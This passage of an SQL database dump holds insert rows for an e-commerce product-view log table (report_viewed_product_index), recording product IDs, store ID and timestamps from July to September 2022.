(1958, NULL, NULL, 2061, 1, '2022-07-20 02:16:13'),
(1959, NULL, NULL, 2059, 1, '2022-07-20 02:17:40'),
(1960, NULL, NULL, 2060, 1, '2022-07-20 02:18:25'),
(1961, NULL, NULL, 2062, 1, '2022-07-20 02:19:07'),
(1962, NULL, NULL, 2063, 1, '2022-07-20 02:19:50'),
(1963, NULL, NULL, 2064, 1, '2022-07-20 02:20:35'),
(1964, NULL, NULL, 2055, 1, '2022-07-20 02:29:43'),
(1965, NULL, NULL, 2054, 1, '2022-07-20 02:30:34'),
(1966, NULL, NULL, 2059, 1, '2022-07-20 11:50:33'),
(1967, 402, NULL, 2064, 1, '2022-07-20 17:28:19'),
(1968, NULL, NULL, 2064, 1, '2022-07-20 21:08:09'),
(1969, NULL, NULL, 2060, 1, '2022-07-21 00:38:52'),
(1970, NULL, NULL, 2054, 1, '2022-07-21 09:39:49'),
(1971, NULL, NULL, 2055, 1, '2022-07-21 09:39:52'),
(1972, NULL, NULL, 2064, 1, '2022-07-21 09:40:06'),
(1973, NULL, NULL, 2063, 1, '2022-07-21 09:40:10'),
(1974, NULL, NULL, 2062, 1, '2022-07-21 09:40:14'),
(1975, NULL, NULL, 2060, 1, '2022-07-21 09:40:18'),
(1976, NULL, NULL, 2059, 1, '2022-07-21 09:40:22'),
(1977, NULL, NULL, 2061, 1, '2022-07-21 09:40:25'),
(1978, NULL, NULL, 2058, 1, '2022-07-21 09:40:28'),
(1979, NULL, NULL, 2053, 1, '2022-07-21 14:20:19'),
(1980, NULL, NULL, 2054, 1, '2022-07-22 13:14:28'),
(1981, NULL, NULL, 2054, 1, '2022-07-23 02:20:16'),
(1982, NULL, NULL, 2055, 1, '2022-07-23 07:59:01'),
(1983, NULL, NULL, 2061, 1, '2022-07-23 13:30:12'),
(1984, NULL, NULL, 2063, 1, '2022-07-24 00:51:49'),
(1985, NULL, NULL, 2064, 1, '2022-07-24 13:13:09'),
(1986, NULL, NULL, 2063, 1, '2022-07-24 16:49:22'),
(1987, NULL, NULL, 2060, 1, '2022-07-24 17:27:37'),
(1988, NULL, NULL, 2063, 1, '2022-07-24 17:30:29'),
(1989, NULL, NULL, 2058, 1, '2022-07-24 17:37:56'),
(1990, NULL, NULL, 2059, 1, '2022-07-24 17:42:52'),
(1991, NULL, NULL, 2055, 1, '2022-07-24 17:51:37'),
(1992, NULL, NULL, 2061, 1, '2022-07-24 18:15:20'),
(1993, NULL, NULL, 2062, 1, '2022-07-24 18:27:59'),
(1994, NULL, NULL, 2062, 1, '2022-07-24 18:28:24'),
(1995, NULL, NULL, 2054, 1, '2022-07-24 18:54:28'),
(1996, NULL, NULL, 2059, 1, '2022-07-24 18:59:33'),
(1997, NULL, NULL, 2064, 1, '2022-07-24 19:04:09'),
(1998, NULL, NULL, 2064, 1, '2022-07-24 22:51:35'),
(1999, NULL, NULL, 2058, 1, '2022-07-24 23:24:37'),
(2000, NULL, NULL, 2061, 1, '2022-07-25 04:08:51'),
(2001, NULL, NULL, 2063, 1, '2022-07-25 07:47:33'),
(2002, NULL, NULL, 2061, 1, '2022-07-25 13:07:49'),
(2003, NULL, NULL, 2061, 1, '2022-07-25 20:43:16'),
(2004, NULL, NULL, 2062, 1, '2022-07-25 20:44:32'),
(2005, NULL, NULL, 2055, 1, '2022-07-26 01:59:49'),
(2006, NULL, NULL, 2064, 1, '2022-07-26 01:59:55'),
(2007, NULL, NULL, 2061, 1, '2022-07-26 01:59:59'),
(2008, NULL, NULL, 2058, 1, '2022-07-26 02:00:04'),
(2009, NULL, NULL, 2061, 1, '2022-07-26 09:21:51'),
(2010, NULL, NULL, 2054, 1, '2022-07-26 23:43:13'),
(2011, NULL, NULL, 2059, 1, '2022-07-28 07:29:39'),
(2012, NULL, NULL, 2061, 1, '2022-07-28 16:44:52'),
(2013, NULL, NULL, 2054, 1, '2022-07-28 18:59:50'),
(2014, NULL, NULL, 2064, 1, '2022-07-29 11:32:18'),
(2015, NULL, NULL, 2061, 1, '2022-07-29 11:50:35'),
(2016, NULL, NULL, 2055, 1, '2022-07-29 19:34:20'),
(2017, NULL, NULL, 2063, 1, '2022-07-29 20:17:47'),
(2018, NULL, NULL, 2062, 1, '2022-07-29 20:28:21'),
(2019, 414, NULL, 2064, 1, '2022-07-29 22:55:48'),
(2023, NULL, NULL, 2064, 1, '2022-07-30 05:04:22'),
(2024, NULL, NULL, 2055, 1, '2022-07-30 09:33:43'),
(2025, NULL, NULL, 2061, 1, '2022-07-30 10:36:35'),
(2026, 416, NULL, 2064, 1, '2022-07-30 13:16:15'),
(2030, NULL, NULL, 2055, 1, '2022-07-30 16:10:55'),
(2031, NULL, NULL, 2061, 1, '2022-07-30 18:15:07'),
(2032, NULL, NULL, 2061, 1, '2022-07-31 03:09:08'),
(2033, NULL, NULL, 2054, 1, '2022-07-31 19:20:04'),
(2034, NULL, NULL, 2060, 1, '2022-07-31 19:35:09'),
(2035, NULL, NULL, 2061, 1, '2022-07-31 19:50:13'),
(2036, NULL, NULL, 2059, 1, '2022-07-31 20:10:31'),
(2037, NULL, NULL, 2064, 1, '2022-07-31 20:25:39'),
(2038, NULL, NULL, 2062, 1, '2022-07-31 20:40:22'),
(2039, NULL, NULL, 2055, 1, '2022-07-31 21:03:18'),
(2040, NULL, NULL, 2063, 1, '2022-07-31 21:22:25'),
(2041, NULL, NULL, 2058, 1, '2022-07-31 21:28:00'),
(2042, NULL, NULL, 2061, 1, '2022-08-01 01:39:17'),
(2043, NULL, NULL, 2054, 1, '2022-08-02 02:24:27'),
(2044, NULL, NULL, 2059, 1, '2022-08-02 08:07:21'),
(2045, NULL, NULL, 2054, 1, '2022-08-02 23:44:58'),
(2046, NULL, NULL, 2055, 1, '2022-08-02 23:45:01'),
(2047, NULL, NULL, 2064, 1, '2022-08-02 23:45:14'),
(2048, NULL, NULL, 2062, 1, '2022-08-02 23:45:16'),
(2049, NULL, NULL, 2063, 1, '2022-08-02 23:45:17'),
(2050, NULL, NULL, 2060, 1, '2022-08-02 23:45:21'),
(2051, NULL, NULL, 2059, 1, '2022-08-02 23:45:22'),
(2052, NULL, NULL, 2061, 1, '2022-08-02 23:45:23'),
(2053, NULL, NULL, 2058, 1, '2022-08-02 23:45:24'),
(2054, NULL, NULL, 2062, 1, '2022-08-03 11:19:56'),
(2055, NULL, NULL, 2062, 1, '2022-08-03 12:41:59'),
(2056, NULL, NULL, 2055, 1, '2022-08-03 17:03:57'),
(2057, NULL, NULL, 2061, 1, '2022-08-04 06:37:19'),
(2058, NULL, NULL, 2054, 1, '2022-08-04 09:38:05'),
(2059, NULL, NULL, 2062, 1, '2022-08-05 04:59:51'),
(2060, NULL, NULL, 2055, 1, '2022-08-05 07:02:15'),
(2061, NULL, NULL, 2055, 1, '2022-08-05 12:16:46'),
(2062, NULL, NULL, 2064, 1, '2022-08-05 17:20:03'),
(2063, NULL, NULL, 2054, 1, '2022-08-06 16:16:36'),
(2064, NULL, NULL, 2060, 1, '2022-08-07 21:17:26'),
(2065, NULL, NULL, 2063, 1, '2022-08-07 21:19:50'),
(2066, NULL, NULL, 2060, 1, '2022-08-07 21:32:38'),
(2067, NULL, NULL, 2063, 1, '2022-08-07 21:34:48'),
(2068, NULL, NULL, 2058, 1, '2022-08-07 21:40:37'),
(2069, NULL, NULL, 2055, 1, '2022-08-07 21:51:36'),
(2070, NULL, NULL, 2061, 1, '2022-08-07 22:12:07'),
(2071, NULL, NULL, 2061, 1, '2022-08-07 22:16:06'),
(2072, NULL, NULL, 2062, 1, '2022-08-07 22:21:24'),
(2073, NULL, NULL, 2054, 1, '2022-08-07 22:42:42'),
(2074, NULL, NULL, 2059, 1, '2022-08-07 22:46:33'),
(2075, NULL, NULL, 2064, 1, '2022-08-07 22:49:52'),
(2076, NULL, NULL, 2061, 1, '2022-08-08 06:02:33'),
(2077, NULL, NULL, 2063, 1, '2022-08-08 11:59:30'),
(2078, NULL, NULL, 2063, 1, '2022-08-08 15:24:32'),
(2079, NULL, NULL, 2062, 1, '2022-08-08 17:47:26'),
(2080, NULL, NULL, 2055, 1, '2022-08-08 20:52:35'),
(2081, NULL, NULL, 2062, 1, '2022-08-09 04:24:08'),
(2082, NULL, NULL, 2055, 1, '2022-08-09 05:11:35'),
(2083, NULL, NULL, 2055, 1, '2022-08-09 07:34:17'),
(2084, NULL, NULL, 2059, 1, '2022-08-09 07:46:24'),
(2085, NULL, NULL, 2054, 1, '2022-08-09 09:41:59'),
(2086, NULL, NULL, 2060, 1, '2022-08-09 09:42:00'),
(2087, NULL, NULL, 2061, 1, '2022-08-09 09:42:02'),
(2088, NULL, NULL, 2058, 1, '2022-08-09 09:42:03'),
(2089, NULL, NULL, 2062, 1, '2022-08-09 09:42:09'),
(2090, NULL, NULL, 2059, 1, '2022-08-09 09:42:11');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(2091, NULL, NULL, 2064, 1, '2022-08-09 09:42:12'),
(2092, NULL, NULL, 2055, 1, '2022-08-09 09:42:13'),
(2093, NULL, NULL, 2063, 1, '2022-08-09 09:42:14'),
(2094, NULL, NULL, 2061, 1, '2022-08-10 14:41:21'),
(2095, NULL, NULL, 2058, 1, '2022-08-10 18:39:17'),
(2096, NULL, NULL, 2064, 1, '2022-08-10 18:39:29'),
(2097, NULL, NULL, 2062, 1, '2022-08-10 18:39:46'),
(2098, NULL, NULL, 2055, 1, '2022-08-10 18:39:50'),
(2099, NULL, NULL, 2054, 1, '2022-08-10 18:40:01'),
(2100, NULL, NULL, 2059, 1, '2022-08-10 18:40:04'),
(2101, NULL, NULL, 2063, 1, '2022-08-10 18:40:05'),
(2102, NULL, NULL, 2061, 1, '2022-08-10 18:40:09'),
(2103, NULL, NULL, 2060, 1, '2022-08-10 18:40:18'),
(2104, NULL, NULL, 2058, 1, '2022-08-10 18:42:19'),
(2105, NULL, NULL, 2054, 1, '2022-08-10 18:42:25'),
(2106, NULL, NULL, 2064, 1, '2022-08-10 18:42:29'),
(2107, NULL, NULL, 2060, 1, '2022-08-10 18:42:38'),
(2108, NULL, NULL, 2062, 1, '2022-08-10 18:42:43'),
(2109, NULL, NULL, 2055, 1, '2022-08-10 18:42:46'),
(2110, NULL, NULL, 2059, 1, '2022-08-10 18:42:53'),
(2111, NULL, NULL, 2063, 1, '2022-08-10 18:42:55'),
(2112, NULL, NULL, 2061, 1, '2022-08-10 18:42:57'),
(2113, NULL, NULL, 2053, 1, '2022-08-10 18:43:14'),
(2114, NULL, NULL, 2064, 1, '2022-08-11 00:24:01'),
(2115, NULL, NULL, 2054, 1, '2022-08-11 00:58:37'),
(2116, NULL, NULL, 2054, 1, '2022-08-11 02:16:47'),
(2117, NULL, NULL, 2064, 1, '2022-08-11 07:14:13'),
(2118, NULL, NULL, 2062, 1, '2022-08-11 07:15:15'),
(2119, NULL, NULL, 2063, 1, '2022-08-11 08:13:47'),
(2120, NULL, NULL, 2061, 1, '2022-08-11 08:13:54'),
(2121, NULL, NULL, 2059, 1, '2022-08-11 08:14:01'),
(2122, NULL, NULL, 2058, 1, '2022-08-11 08:14:08'),
(2123, NULL, NULL, 2055, 1, '2022-08-11 08:14:15'),
(2124, NULL, NULL, 2054, 1, '2022-08-11 08:14:22'),
(2125, NULL, NULL, 2060, 1, '2022-08-11 08:14:35'),
(2126, NULL, NULL, 2055, 1, '2022-08-11 10:49:48'),
(2127, NULL, NULL, 2064, 1, '2022-08-11 11:21:13'),
(2128, NULL, NULL, 2064, 1, '2022-08-11 13:14:15'),
(2129, NULL, NULL, 2062, 1, '2022-08-11 13:57:45'),
(2130, NULL, NULL, 2063, 1, '2022-08-11 13:58:09'),
(2131, NULL, NULL, 2061, 1, '2022-08-11 13:58:16'),
(2132, NULL, NULL, 2059, 1, '2022-08-11 13:58:23'),
(2133, NULL, NULL, 2058, 1, '2022-08-11 13:58:30'),
(2134, NULL, NULL, 2055, 1, '2022-08-11 13:58:37'),
(2135, NULL, NULL, 2054, 1, '2022-08-11 13:58:44'),
(2136, NULL, NULL, 2061, 1, '2022-08-11 15:05:03'),
(2137, NULL, NULL, 2060, 1, '2022-08-11 15:41:30'),
(2138, NULL, NULL, 2059, 1, '2022-08-11 17:17:16'),
(2139, NULL, NULL, 2059, 1, '2022-08-11 17:26:29'),
(2140, NULL, NULL, 2062, 1, '2022-08-11 19:28:35'),
(2141, NULL, NULL, 2064, 1, '2022-08-11 20:01:03'),
(2142, NULL, NULL, 2062, 1, '2022-08-11 20:59:06'),
(2143, NULL, NULL, 2063, 1, '2022-08-11 21:00:02'),
(2144, NULL, NULL, 2061, 1, '2022-08-11 21:00:09'),
(2145, NULL, NULL, 2059, 1, '2022-08-11 21:00:17'),
(2146, NULL, NULL, 2058, 1, '2022-08-11 21:00:23'),
(2147, NULL, NULL, 2055, 1, '2022-08-11 21:00:31'),
(2148, NULL, NULL, 2054, 1, '2022-08-11 21:00:38'),
(2149, NULL, NULL, 2060, 1, '2022-08-11 21:50:24'),
(2150, NULL, NULL, 2054, 1, '2022-08-11 21:53:07'),
(2151, NULL, NULL, 2055, 1, '2022-08-12 09:36:11'),
(2152, NULL, NULL, 2064, 1, '2022-08-12 11:02:15'),
(2153, NULL, NULL, 2062, 1, '2022-08-12 12:46:00'),
(2154, NULL, NULL, 2063, 1, '2022-08-12 12:46:36'),
(2155, NULL, NULL, 2061, 1, '2022-08-12 12:46:43'),
(2156, NULL, NULL, 2059, 1, '2022-08-12 12:46:50'),
(2157, NULL, NULL, 2058, 1, '2022-08-12 12:46:56'),
(2158, NULL, NULL, 2055, 1, '2022-08-12 12:47:03'),
(2159, NULL, NULL, 2054, 1, '2022-08-12 12:47:10'),
(2160, NULL, NULL, 2060, 1, '2022-08-12 13:05:35'),
(2161, NULL, NULL, 2059, 1, '2022-08-12 14:43:37'),
(2162, NULL, NULL, 2054, 1, '2022-08-12 15:57:51'),
(2163, NULL, NULL, 2054, 1, '2022-08-12 16:42:51'),
(2164, NULL, NULL, 2064, 1, '2022-08-13 12:15:51'),
(2165, NULL, NULL, 2062, 1, '2022-08-13 13:32:55'),
(2166, NULL, NULL, 2063, 1, '2022-08-13 13:34:47'),
(2167, NULL, NULL, 2061, 1, '2022-08-13 13:34:57'),
(2168, NULL, NULL, 2059, 1, '2022-08-13 13:35:05'),
(2169, NULL, NULL, 2058, 1, '2022-08-13 13:35:18'),
(2170, NULL, NULL, 2055, 1, '2022-08-13 13:35:28'),
(2171, NULL, NULL, 2054, 1, '2022-08-13 13:35:42'),
(2172, NULL, NULL, 2060, 1, '2022-08-13 14:26:29'),
(2173, NULL, NULL, 2058, 1, '2022-08-13 14:31:11'),
(2174, NULL, NULL, 2060, 1, '2022-08-13 20:29:01'),
(2175, NULL, NULL, 2064, 1, '2022-08-13 21:19:22'),
(2176, NULL, NULL, 2062, 1, '2022-08-13 21:31:17'),
(2177, NULL, NULL, 2063, 1, '2022-08-13 21:32:00'),
(2178, NULL, NULL, 2061, 1, '2022-08-13 21:32:10'),
(2179, NULL, NULL, 2059, 1, '2022-08-13 21:32:19'),
(2180, NULL, NULL, 2058, 1, '2022-08-13 21:32:29'),
(2181, NULL, NULL, 2055, 1, '2022-08-13 21:32:37'),
(2182, NULL, NULL, 2054, 1, '2022-08-13 21:32:49'),
(2183, NULL, NULL, 2060, 1, '2022-08-13 23:09:43'),
(2184, NULL, NULL, 2061, 1, '2022-08-14 03:48:16'),
(2185, NULL, NULL, 2061, 1, '2022-08-14 09:59:54'),
(2186, NULL, NULL, 2064, 1, '2022-08-14 16:04:45'),
(2187, NULL, NULL, 2061, 1, '2022-08-14 18:21:15'),
(2188, NULL, NULL, 2060, 1, '2022-08-14 21:29:53'),
(2189, NULL, NULL, 2063, 1, '2022-08-14 21:32:14'),
(2190, NULL, NULL, 2058, 1, '2022-08-14 21:38:04'),
(2191, NULL, NULL, 2055, 1, '2022-08-14 21:49:11'),
(2192, NULL, NULL, 2061, 1, '2022-08-14 22:06:09'),
(2193, NULL, NULL, 2062, 1, '2022-08-14 22:15:11'),
(2194, NULL, NULL, 2054, 1, '2022-08-14 22:33:39'),
(2195, NULL, NULL, 2059, 1, '2022-08-14 22:36:49'),
(2196, NULL, NULL, 2064, 1, '2022-08-14 22:39:45'),
(2197, NULL, NULL, 2058, 1, '2022-08-15 09:48:51'),
(2198, NULL, NULL, 2063, 1, '2022-08-15 15:51:07'),
(2199, NULL, NULL, 2060, 1, '2022-08-15 20:27:01'),
(2200, NULL, NULL, 2054, 1, '2022-08-15 22:27:03'),
(2201, NULL, NULL, 2063, 1, '2022-08-16 05:35:47'),
(2202, NULL, NULL, 2055, 1, '2022-08-16 15:49:54'),
(2203, NULL, NULL, 2062, 1, '2022-08-16 20:24:52'),
(2204, NULL, NULL, 2054, 1, '2022-08-16 21:06:06'),
(2205, NULL, NULL, 2054, 1, '2022-08-17 00:22:03'),
(2206, NULL, NULL, 2064, 1, '2022-08-17 12:23:23'),
(2207, NULL, NULL, 2064, 1, '2022-08-18 14:33:30'),
(2208, NULL, NULL, 2062, 1, '2022-08-18 16:37:04'),
(2209, NULL, NULL, 2054, 1, '2022-08-18 17:42:27'),
(2210, NULL, NULL, 2061, 1, '2022-08-18 22:36:10'),
(2211, NULL, NULL, 2061, 1, '2022-08-19 03:38:42'),
(2212, NULL, NULL, 2055, 1, '2022-08-20 05:34:25'),
(2213, NULL, NULL, 2054, 1, '2022-08-20 23:50:33'),
(2214, NULL, NULL, 2062, 1, '2022-08-21 08:58:37'),
(2215, NULL, NULL, 2063, 1, '2022-08-21 12:38:56'),
(2216, NULL, NULL, 2054, 1, '2022-08-21 17:34:28'),
(2217, NULL, NULL, 2060, 1, '2022-08-21 22:39:34'),
(2218, NULL, NULL, 2063, 1, '2022-08-21 22:41:56'),
(2219, NULL, NULL, 2058, 1, '2022-08-21 22:48:22'),
(2220, NULL, NULL, 2055, 1, '2022-08-21 22:59:57'),
(2221, NULL, NULL, 2061, 1, '2022-08-21 23:17:38'),
(2222, NULL, NULL, 2062, 1, '2022-08-21 23:26:59'),
(2223, NULL, NULL, 2054, 1, '2022-08-21 23:44:04'),
(2224, NULL, NULL, 2059, 1, '2022-08-21 23:47:34'),
(2225, NULL, NULL, 2064, 1, '2022-08-21 23:50:10'),
(2226, NULL, NULL, 2059, 1, '2022-08-22 02:08:08'),
(2227, NULL, NULL, 2061, 1, '2022-08-22 05:49:20'),
(2228, NULL, NULL, 2054, 1, '2022-08-22 06:41:37'),
(2229, NULL, NULL, 2054, 1, '2022-08-22 12:14:20'),
(2230, NULL, NULL, 2055, 1, '2022-08-22 12:14:27'),
(2231, NULL, NULL, 2064, 1, '2022-08-22 12:14:57'),
(2232, NULL, NULL, 2063, 1, '2022-08-22 12:15:03'),
(2233, NULL, NULL, 2062, 1, '2022-08-22 12:15:07'),
(2234, NULL, NULL, 2060, 1, '2022-08-22 12:15:12'),
(2235, NULL, NULL, 2059, 1, '2022-08-22 12:15:18'),
(2236, NULL, NULL, 2061, 1, '2022-08-22 12:15:31'),
(2237, NULL, NULL, 2058, 1, '2022-08-22 12:15:39'),
(2238, NULL, NULL, 2053, 1, '2022-08-22 19:29:52'),
(2239, NULL, NULL, 2061, 1, '2022-08-22 20:41:37'),
(2240, NULL, NULL, 2058, 1, '2022-08-23 05:14:41'),
(2241, NULL, NULL, 2060, 1, '2022-08-23 05:47:36'),
(2242, NULL, NULL, 2060, 1, '2022-08-23 05:52:58'),
(2243, NULL, NULL, 2061, 1, '2022-08-23 07:32:49'),
(2244, NULL, NULL, 2064, 1, '2022-08-23 10:38:55'),
(2245, NULL, NULL, 2055, 1, '2022-08-23 19:28:29'),
(2246, NULL, NULL, 2062, 1, '2022-08-23 20:42:07'),
(2247, NULL, NULL, 2055, 1, '2022-08-24 01:49:27'),
(2248, NULL, NULL, 2062, 1, '2022-08-24 04:04:01'),
(2249, NULL, NULL, 2061, 1, '2022-08-24 04:25:36'),
(2250, NULL, NULL, 2061, 1, '2022-08-24 14:34:57'),
(2251, NULL, NULL, 2055, 1, '2022-08-25 13:20:56'),
(2252, NULL, NULL, 2055, 1, '2022-08-26 12:49:41'),
(2253, NULL, NULL, 2059, 1, '2022-08-27 02:49:40'),
(2254, NULL, NULL, 2054, 1, '2022-08-27 12:25:09'),
(2255, NULL, NULL, 2059, 1, '2022-08-27 17:14:38'),
(2256, NULL, NULL, 2055, 1, '2022-08-27 20:59:37'),
(2257, NULL, NULL, 2054, 1, '2022-08-27 23:24:45'),
(2258, NULL, NULL, 2062, 1, '2022-08-28 01:57:46'),
(2259, 459, NULL, 2064, 1, '2022-08-28 04:33:45'),
(2262, NULL, NULL, 2061, 1, '2022-08-28 20:05:02'),
(2263, NULL, NULL, 2060, 1, '2022-08-29 00:20:56'),
(2264, NULL, NULL, 2063, 1, '2022-08-29 00:22:45'),
(2265, NULL, NULL, 2058, 1, '2022-08-29 00:27:16'),
(2266, NULL, NULL, 2055, 1, '2022-08-29 00:35:26'),
(2267, NULL, NULL, 2061, 1, '2022-08-29 00:46:59'),
(2268, NULL, NULL, 2062, 1, '2022-08-29 00:53:48'),
(2269, NULL, NULL, 2054, 1, '2022-08-29 01:05:01'),
(2270, NULL, NULL, 2059, 1, '2022-08-29 01:07:10'),
(2271, NULL, NULL, 2064, 1, '2022-08-29 01:09:06'),
(2272, NULL, NULL, 2061, 1, '2022-08-29 04:37:08'),
(2273, NULL, NULL, 2061, 1, '2022-08-29 12:23:18'),
(2274, NULL, NULL, 2064, 1, '2022-08-29 16:16:06'),
(2275, NULL, NULL, 2054, 1, '2022-08-29 18:40:34'),
(2276, NULL, NULL, 2064, 1, '2022-08-30 03:27:51'),
(2277, NULL, NULL, 2064, 1, '2022-08-30 14:24:37'),
(2278, NULL, NULL, 2061, 1, '2022-08-30 20:12:17'),
(2279, NULL, NULL, 2063, 1, '2022-08-31 01:44:58'),
(2280, NULL, NULL, 2058, 1, '2022-08-31 02:54:20'),
(2281, NULL, NULL, 2060, 1, '2022-08-31 13:06:54'),
(2282, NULL, NULL, 2062, 1, '2022-08-31 15:48:26'),
(2283, 467, NULL, 2063, 1, '2022-08-31 15:49:50'),
(2284, NULL, NULL, 2054, 1, '2022-09-01 14:13:36'),
(2285, NULL, NULL, 2055, 1, '2022-09-01 14:15:18'),
(2286, NULL, NULL, 2058, 1, '2022-09-01 14:18:25'),
(2287, NULL, NULL, 2061, 1, '2022-09-01 14:22:01'),
(2288, NULL, NULL, 2060, 1, '2022-09-01 14:22:10'),
(2289, NULL, NULL, 2059, 1, '2022-09-01 14:25:05'),
(2290, NULL, NULL, 2063, 1, '2022-09-01 14:25:33'),
(2291, NULL, NULL, 2062, 1, '2022-09-01 14:27:40'),
(2292, NULL, NULL, 2064, 1, '2022-09-01 14:30:18'),
(2293, NULL, NULL, 2059, 1, '2022-09-01 21:17:50'),
(2294, NULL, NULL, 2054, 1, '2022-09-02 12:52:06'),
(2295, NULL, NULL, 2055, 1, '2022-09-02 21:58:00'),
(2296, NULL, NULL, 2061, 1, '2022-09-03 06:03:56'),
(2297, NULL, NULL, 2062, 1, '2022-09-03 14:25:36'),
(2298, NULL, NULL, 2064, 1, '2022-09-04 10:28:09'),
(2299, NULL, NULL, 2063, 1, '2022-09-04 10:28:26'),
(2300, NULL, NULL, 2062, 1, '2022-09-04 10:28:41'),
(2301, NULL, NULL, 2061, 1, '2022-09-04 10:28:52'),
(2302, NULL, NULL, 2060, 1, '2022-09-04 10:29:04'),
(2303, NULL, NULL, 2059, 1, '2022-09-04 10:29:20'),
(2304, NULL, NULL, 2058, 1, '2022-09-04 10:29:33'),
(2305, NULL, NULL, 2055, 1, '2022-09-04 10:29:47'),
(2306, NULL, NULL, 2054, 1, '2022-09-04 10:30:00'),
(2307, NULL, NULL, 2053, 1, '2022-09-04 10:45:03'),
(2308, NULL, NULL, 2061, 1, '2022-09-04 15:01:10'),
(2309, NULL, NULL, 2064, 1, '2022-09-04 16:03:47'),
(2310, NULL, NULL, 2060, 1, '2022-09-05 02:21:30'),
(2311, NULL, NULL, 2063, 1, '2022-09-05 02:22:57'),
(2312, NULL, NULL, 2058, 1, '2022-09-05 02:26:44'),
(2313, NULL, NULL, 2055, 1, '2022-09-05 02:33:42'),
(2314, NULL, NULL, 2061, 1, '2022-09-05 02:45:04'),
(2315, NULL, NULL, 2062, 1, '2022-09-05 02:51:39'),
(2316, NULL, NULL, 2054, 1, '2022-09-05 03:02:54'),
(2317, NULL, NULL, 2059, 1, '2022-09-05 03:05:22'),
(2318, NULL, NULL, 2064, 1, '2022-09-05 03:07:18'),
(2319, NULL, NULL, 2064, 1, '2022-09-05 18:28:16'),
(2320, NULL, NULL, 2053, 1, '2022-09-06 12:43:22'),
(2321, NULL, NULL, 2054, 1, '2022-09-06 12:43:27'),
(2322, NULL, NULL, 2055, 1, '2022-09-06 12:43:30'),
(2323, NULL, NULL, 2064, 1, '2022-09-06 12:43:42'),
(2324, NULL, NULL, 2063, 1, '2022-09-06 12:43:48'),
(2325, NULL, NULL, 2062, 1, '2022-09-06 12:43:52'),
(2326, NULL, NULL, 2060, 1, '2022-09-06 12:43:56'),
(2327, NULL, NULL, 2059, 1, '2022-09-06 12:44:00'),
(2328, NULL, NULL, 2061, 1, '2022-09-06 12:44:03'),
(2329, NULL, NULL, 2058, 1, '2022-09-06 12:44:07'),
(2330, NULL, NULL, 2063, 1, '2022-09-06 16:22:42'),
(2331, NULL, NULL, 2058, 1, '2022-09-06 16:22:44'),
(2332, NULL, NULL, 2061, 1, '2022-09-06 20:03:39'),
(2333, NULL, NULL, 2061, 1, '2022-09-07 05:29:45'),
(2334, NULL, NULL, 2061, 1, '2022-09-07 15:55:07'),
(2335, NULL, NULL, 2061, 1, '2022-09-08 02:44:58'),
(2336, NULL, NULL, 2055, 1, '2022-09-09 02:12:37'),
(2337, NULL, NULL, 2062, 1, '2022-09-09 06:10:25'),
(2338, NULL, NULL, 2061, 1, '2022-09-09 14:46:37'),
(2339, NULL, NULL, 2054, 1, '2022-09-09 17:04:28'),
(2340, NULL, NULL, 2054, 1, '2022-09-09 21:13:22'),
(2341, NULL, NULL, 2059, 1, '2022-09-10 15:03:06'),
(2342, NULL, NULL, 2059, 1, '2022-09-10 17:16:32'),
(2343, NULL, NULL, 2059, 1, '2022-09-10 18:01:32'),
(2344, NULL, NULL, 2064, 1, '2022-09-11 09:27:46'),
(2345, NULL, NULL, 2061, 1, '2022-09-11 23:37:02'),
(2346, NULL, NULL, 2060, 1, '2022-09-12 03:23:46'),
(2347, NULL, NULL, 2063, 1, '2022-09-12 03:25:13'),
(2348, NULL, NULL, 2058, 1, '2022-09-12 03:28:54'),
(2349, NULL, NULL, 2055, 1, '2022-09-12 03:34:58'),
(2350, NULL, NULL, 2061, 1, '2022-09-12 03:44:40'),
(2351, NULL, NULL, 2060, 1, '2022-09-12 03:50:46'),
(2352, NULL, NULL, 2063, 1, '2022-09-12 03:52:02'),
(2353, NULL, NULL, 2058, 1, '2022-09-12 03:54:57'),
(2354, NULL, NULL, 2055, 1, '2022-09-12 04:00:27'),
(2355, NULL, NULL, 2061, 1, '2022-09-12 04:09:58'),
(2356, NULL, NULL, 2062, 1, '2022-09-12 04:15:23'),
(2357, NULL, NULL, 2054, 1, '2022-09-12 04:25:21'),
(2358, NULL, NULL, 2059, 1, '2022-09-12 04:27:23'),
(2359, NULL, NULL, 2064, 1, '2022-09-12 04:29:04'),
(2360, NULL, NULL, 2064, 1, '2022-09-12 11:30:08'),
(2361, NULL, NULL, 2061, 1, '2022-09-12 20:33:18'),
(2362, NULL, NULL, 2054, 1, '2022-09-12 20:41:11'),
(2363, NULL, NULL, 2059, 1, '2022-09-12 21:51:31'),
(2364, NULL, NULL, 2064, 1, '2022-09-13 07:22:46'),
(2365, NULL, NULL, 2064, 1, '2022-09-13 09:51:21'),
(2366, NULL, NULL, 2062, 1, '2022-09-14 06:44:13'),
(2367, NULL, NULL, 2061, 1, '2022-09-14 20:36:38'),
(2368, NULL, NULL, 2054, 1, '2022-09-14 22:07:10'),
(2369, NULL, NULL, 2059, 1, '2022-09-15 03:44:31'),
(2370, NULL, NULL, 2064, 1, '2022-09-15 05:01:08'),
(2371, NULL, NULL, 2062, 1, '2022-09-15 19:27:03'),
(2372, NULL, NULL, 2061, 1, '2022-09-15 21:26:53'),
(2373, NULL, NULL, 2064, 1, '2022-09-16 02:42:11'),
(2374, NULL, NULL, 2061, 1, '2022-09-16 06:11:01'),
(2375, NULL, NULL, 2059, 1, '2022-09-16 22:50:36'),
(2376, NULL, NULL, 2063, 1, '2022-09-16 23:23:13'),
(2377, NULL, NULL, 2054, 1, '2022-09-17 02:10:31'),
(2378, NULL, NULL, 2063, 1, '2022-09-17 08:32:30'),
(2379, NULL, NULL, 2061, 1, '2022-09-17 13:54:14'),
(2380, NULL, NULL, 2062, 1, '2022-09-17 15:26:17'),
(2381, NULL, NULL, 2059, 1, '2022-09-17 15:47:47'),
(2382, NULL, NULL, 2055, 1, '2022-09-17 17:21:58'),
(2383, NULL, NULL, 2064, 1, '2022-09-17 22:30:23'),
(2384, NULL, NULL, 2062, 1, '2022-09-17 22:45:41'),
(2385, NULL, NULL, 2058, 1, '2022-09-18 03:39:14'),
(2386, NULL, NULL, 2063, 1, '2022-09-18 14:59:55'),
(2387, NULL, NULL, 2064, 1, '2022-09-18 17:21:56'),
(2388, NULL, NULL, 2055, 1, '2022-09-18 22:37:29'),
(2389, NULL, NULL, 2059, 1, '2022-09-18 22:54:20'),
(2390, NULL, NULL, 2060, 1, '2022-09-19 06:02:06'),
(2391, NULL, NULL, 2063, 1, '2022-09-19 06:03:47'),
